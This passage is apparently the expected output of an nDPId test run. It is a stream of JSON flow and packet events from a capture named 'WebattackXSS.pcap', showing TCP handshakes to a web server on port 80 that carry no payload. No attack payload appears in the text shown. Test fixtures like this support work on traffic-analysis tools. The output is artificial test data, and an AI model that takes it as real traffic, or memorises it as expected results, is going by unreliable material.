port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347886296,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347886296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8J3NAAD4Gnl2sEAABwKgKMoPAAFDfgE5wAAAAAKACchBCwwAAAgQFtAQCCAoBPGkDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7637,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":2,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg8DWbqB034BOcaAScSCOYQAAAgQFtAQCCAoD5jp3ATxpAwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":3,"flow_last_seen":1499347886297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347886297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0J3RAAD4GnmSsEAABwKgKMoPAAFDfgE5x1m6gdYAQAOUtaQAAAQEICgE8aQMD5jp3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347887572,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347887572,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vidAAD4GB6msEAABwKgKMoPOAFDy3tRlAAAAAKACchCoIgAAAgQFtAQCCAoBPGpCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":2,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg85IicNz8t7UZqAScSBdaAAAAgQFtAQCCAoD5ju2ATxqQgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":3,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vihAAD4GB7CsEAABwKgKMoPOAFDy3tRmSInDdIAQAOX8bwAAAQEICgE8akID5ju2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347890192,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347890192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gVNAAD4GRH2sEAABwKgKMoPoAFBPU+2CAAAAAKACchAv6AAAAgQFtAQCCAoBPGzRAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":2,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg+hXA92bT1Ptg6AScSC5\/AAAAgQFtAQCCAoD5j5FATxs0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":3,"flow_last_seen":1499347890193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347890193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gVRAAD4GRISsEAABwKgKMoPoAFBPU+2DVwPdnIAQAOVZBAAAAQEICgE8bNED5j5F"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347891536,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347891536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JsNAAD4Gnw2sEAABwKgKMoP2AFBiQUjiAAAAAKACchDAPAAAAgQFtAQCCAoBPG4hAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":2,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg\/bwNNpHYkFI46AScSCzIwAAAgQFtAQCCAoD5j+VATxuIQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":3,"flow_last_seen":1499347891537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347891537,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JsRAAD4GnxSsEAABwKgKMoP2AFBiQUjj8DTaSIAQAOVSKwAAAQEICgE8biED5j+V"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347894093,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347894093,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W6ZAAD4GaiqsEAABwKgKMoQQAFDdYCsGAAAAAKACchBgYAAAAgQFtAQCCAoBPHCgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":2,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhBBGWrmb3WArB6AScSAbTwAAAgQFtAQCCAoD5kIUATxwoAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":3,"flow_last_seen":1499347894094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347894094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W6dAAD4GajGsEAABwKgKMoQQAFDdYCsHRlq5nIAQAOW6VgAAAQEICgE8cKAD5kIU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347895396,"flow_last_seen":1499347895396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895396,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1499347895396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895396,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+PRAAD4GzNusEAABwKgKMoQeAFBBmIkSAAAAAKACchCcyAAAAgQFtAQCCAoBPHHmAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":2,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895397,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhB6fI8DwQZiJE6AScSD2UgAAAgQFtAQCCAoD5kNaATxx5gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":3,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347895397,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+PVAAD4GzOKsEAABwKgKMoQeAFBBmIkTnyPA8YAQAOWVWgAAAQEICgE8ceYD5kNa"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347896716,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347896716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SsxAAD4GewSsEAABwKgKMoQsAFDW1Dn8AAAAAKACchBVSgAAAgQFtAQCCAoBPHMwAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":2,"flow_last_seen":1499347896716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhCxEXQKe1tQ5\/aAScSDGowAAAgQFtAQCCAoD5kSkATxzMAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":3,"flow_last_seen":1499347896717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347896717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ss1AAD4GewusEAABwKgKMoQsAFDW1Dn9RF0Cn4AQAOVlqwAAAQEICgE8czAD5kSk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347899275,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347899275,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zuFAAD4G9u6sEAABwKgKMoRGAFBlPbtRAAAAAKACchBC8gAAAgQFtAQCCAoBPHWwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":2,"flow_last_seen":1499347899275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhEbZtc2dZT27UqAScSBRcwAAAgQFtAQCCAoD5kckATx1sAEDAwc="} 